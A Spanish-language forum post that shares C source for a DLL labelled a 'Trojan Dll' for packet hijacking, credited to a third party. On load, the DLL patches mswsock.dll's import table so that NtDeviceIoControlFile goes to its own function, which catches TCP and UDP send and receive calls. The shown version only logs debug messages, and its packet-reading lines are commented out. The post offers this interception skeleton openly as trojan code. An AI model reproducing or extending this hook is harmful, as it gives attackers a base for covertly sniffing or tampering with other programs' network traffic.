Hola a todos les comparto el siguiente codigo hecho por mi gran amigo ZwClose7Team

espero que les guste a todos .

Código: Seleccionar todo

    //////////////////////////////////////////////////////////////////////////
    // Project:     Trojan Dll,Packet Hijacking
    // Author:      http://pastebin.com/uaj6BksR
    // Date:        2014-3-21
    //////////////////////////////////////////////////////////////////////////
     
    #include <windows.h>
    #include <winnt.h>
     
    #define AFD_RECV                0x12017
    #define AFD_BIND                0x12003
    #define AFD_CONNECT             0x12007
    #define AFD_SET_CONTEXT 0x12047
    #define AFD_RECV                0x12017
    #define AFD_SEND                0x1201f
    #define AFD_SELECT              0x12024
    #define AFD_SENDTO              0x12023
    #define AFD_RECVFROM    0x1201B
    #define CV                              0x1201f
     
    #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
     
    typedef struct _IO_STATUS_BLOCK {
            union {
                    NTSTATUS Status;
                    PVOID Pointer;
            } DUMMYUNIONNAME;
     
            ULONG_PTR Information;
    } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
     
    typedef
    VOID
    (NTAPI *PIO_APC_ROUTINE) (
                                                      IN PVOID ApcContext,
                                                      IN PIO_STATUS_BLOCK IoStatusBlock,
                                                      IN ULONG Reserved
                                                      );
     
    typedef NTSTATUS (*NTDEVICEIOCONTROLFILE)(IN HANDLE FileHandle,
                                                                                      IN HANDLE Event OPTIONAL,
                                                                                      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                                                      IN PVOID ApcContext OPTIONAL,
                                                                                      OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                                                      IN ULONG IoControlCode,
                                                                                      IN PVOID InputBuffer OPTIONAL,
                                                                                      IN ULONG InputBufferLength,
                                                                                      OUT PVOID OutputBuffer OPTIONAL,
                                                                                      IN ULONG OutputBufferLength);
     
    NTDEVICEIOCONTROLFILE ZwDeviceIoControlFile = NULL;
     
     
    // Hook NtDeviceIoControlFile()
    BOOL HookApi(BOOL bFlag);
     
    // New Hook Function
    NTSTATUS NewDeviceIoControlFile(IN HANDLE FileHandle,
                                                                    IN HANDLE Event OPTIONAL,
                                                                    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                                    IN PVOID ApcContext OPTIONAL,
                                                                    OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                                    IN ULONG IoControlCode,
                                                                    IN PVOID InputBuffer OPTIONAL,
                                                                    IN ULONG InputBufferLength,
                                                                    OUT PVOID OutputBuffer OPTIONAL,
                                                                    IN ULONG OutputBufferLength);
     
     
    int WINAPI DllMain(__in void * _HDllHandle, __in unsigned _Reason, __in_opt void * _Reserved)
    {
            if (_Reason == DLL_PROCESS_ATTACH)
            {
                    HookApi(TRUE);
            }
            else if (_Reason == DLL_PROCESS_DETACH)
            {
                    HookApi(FALSE);
            }
     
            return TRUE;
    }
     
     
    //////////////////////////////////////////////////////////////////////////
    // Hook NtDeviceIoControlFile()
    //////////////////////////////////////////////////////////////////////////
    BOOL HookApi(BOOL bFlag)
    {
            HMODULE hModule = LoadLibrary(TEXT("mswsock.dll"));
            if (hModule == NULL)
            {
                    return FALSE;
            }
     
            PIMAGE_DOS_HEADER pDosHdr = (PIMAGE_DOS_HEADER)hModule;
            if (pDosHdr->e_magic != IMAGE_DOS_SIGNATURE)
            {
                    return FALSE;
            }
     
            PIMAGE_NT_HEADERS pNtHdr = (PIMAGE_NT_HEADERS)((ULONG)hModule+pDosHdr->e_lfanew);
            if (pNtHdr->Signature != IMAGE_NT_SIGNATURE)
            {
                    return FALSE;
            }
     
            if (pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress==0 ||
                    pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size==0)
            {
                    return FALSE;
            }
     
            PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG)hModule+pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
            PIMAGE_THUNK_DATA       ThunkData;
            while (pImportDescriptor->FirstThunk)
            {
                    char* dllname = (PCHAR)((ULONG)hModule+pImportDescriptor->Name);
                    if (stricmp(dllname,"ntdll.dll") != 0)
                    {
                            pImportDescriptor++;
                            continue;
                    }
     
                    ThunkData = (PIMAGE_THUNK_DATA)((ULONG)hModule+pImportDescriptor->OriginalFirstThunk);
                    int index = 1;
                    while (ThunkData->u1.Function)
                    {
                            char* funame = (PCHAR)((ULONG)hModule+ThunkData->u1.AddressOfData+2);
                            if (stricmp(funame,"NtDeviceIoControlFile") == 0)
                            {
                                    ULONG dwRet,myAdr;
                                    PDWORD lpAdr = (PDWORD)((ULONG)hModule+(DWORD)pImportDescriptor->FirstThunk)+index-1;
                                    ZwDeviceIoControlFile = (NTDEVICEIOCONTROLFILE)(*(ULONG*)lpAdr);
                                    if (bFlag)
                                    {
                                            myAdr = (ULONG)NewDeviceIoControlFile;
                                    }
                                    else
                                    {
                                            myAdr = (ULONG)ZwDeviceIoControlFile;
                                    }
                                    WriteProcessMemory(GetCurrentProcess(),lpAdr,&myAdr,sizeof(ULONG),&dwRet);
                                   
                                    return TRUE;
                            }
                            index++;
                            ThunkData++;
                    }
                    pImportDescriptor++;
            }
     
            return FALSE;
    }
     
     
     
    //////////////////////////////////////////////////////////////////////////
    // New Hook Function
    //////////////////////////////////////////////////////////////////////////
    NTSTATUS NewDeviceIoControlFile(IN HANDLE FileHandle,
                                                                    IN HANDLE Event OPTIONAL,
                                                                    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                                    IN PVOID ApcContext OPTIONAL,
                                                                    OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                                    IN ULONG IoControlCode,
                                                                    IN PVOID InputBuffer OPTIONAL,
                                                                    IN ULONG InputBufferLength,
                                                                    OUT PVOID OutputBuffer OPTIONAL,
                                                                    IN ULONG OutputBufferLength)
    {
            NTSTATUS status;
            status = ZwDeviceIoControlFile(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,IoControlCode,InputBuffer,InputBufferLength,OutputBuffer,OutputBufferLength);
            if (!NT_SUCCESS(status))
            {
                    return status;
            }
     
            if (IoControlCode!=AFD_SEND && IoControlCode!=AFD_RECV && IoControlCode!=AFD_SENDTO && IoControlCode!=AFD_RECVFROM)
            {
                    return status;
            }
     
            __try{
                    //PAFD_INFO AfdInfo = (PAFD_INFO)InputBuffer;
                    //PVOID Buffer = AfdInfo->BufferArray->buf;
                    //ULONG Len = AfdInfo->BufferArray->len;
     
                    switch (IoControlCode)
                    {
                    case AFD_RECV:
                            {
                                    OutputDebugStringA("[TCP Recv Packets]\n");
                            }
                            break;
                    case AFD_SEND:
                            {
                                    OutputDebugStringA("[TCP Send Packets]\n");
                            }
                            break;
                    case AFD_SENDTO:
                            {
                                    OutputDebugStringA("[UDP Sendto Packets]\n");
                            }
                            break;
                    case AFD_RECVFROM:
                            {
                                    OutputDebugStringA("[UDP RecvFrom Packets]\n");
                            }
                            break;
                    }
            }__except(EXCEPTION_EXECUTE_HANDLER)
            {
                    return status;
            }
     
            return status;
    }
download :

[Enlace externo eliminado para invitados]

Código: Seleccionar todo

NoExistente
[/color]
Responder

Volver a “Fuentes”